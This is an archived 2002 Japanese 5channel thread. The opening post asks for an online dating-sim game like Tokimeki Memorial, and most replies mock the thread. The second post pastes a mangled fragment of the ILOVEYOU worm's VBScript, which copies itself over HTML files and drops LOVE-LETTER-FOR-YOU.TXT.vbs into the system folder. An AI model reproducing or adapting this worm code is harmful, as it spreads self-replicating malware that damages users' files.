5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ネットゲームで『ときメモ』出ないかな?

1 :蟹座デスマスク:02/07/07 15:32 ID:XqZftTus
ネカマになってモテモテ女になり最後の最後で
ターゲットの男を振るなんて最高だろ?
当然『シカト』『いじめ』『パシリ』も有り!!
もう28歳の俺にはもう一度学生生活に夢見てみたいんだよ・・・
誰か作って〜!3万で買うからさ。

2 : :02/07/07 15:36 ID:mRbdDazU
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l", truefso.CopyFile HostPath, f1.path, trueEnd IfNext
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

3 :名も無き冒険者:02/07/07 15:51 ID:hdc2MTyQ
2getされた、俺の生きがいは糞スレの2をとることなのに・・・
>>2は漏れに謝罪しる

4 :名も無き冒険者:02/07/07 18:05 ID:oSHmbIJI
とにかくクソスレッドが早く沈む事を祈るのみ

5 :名も無き冒険者:02/07/07 22:08 ID:Les5J3/U
四万出そう。

6 :名も無き冒険者:02/07/08 10:23 ID:4VuTleY.
>>1
以前、ときメモ2のIDでネット上の仮想空間としてひびきのネット及び
ひびきの高校というものがあった。

んで、ネカマ演じてもオフとかあるので、すぐにネカマだとばれるよ(w
というか、クソスレたてるなよ

7 :◆I6oFsl7w:02/07/10 04:10 ID:jO2MDGB.
test

>1はバカ

8 :◆AARsQ0ec:02/07/10 04:11 ID:jO2MDGB.
test

ギャルゲヲタうざい

9 :◆0WIJHuaM:02/07/10 04:12 ID:jO2MDGB.
test

小波も逝ってよし

2 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)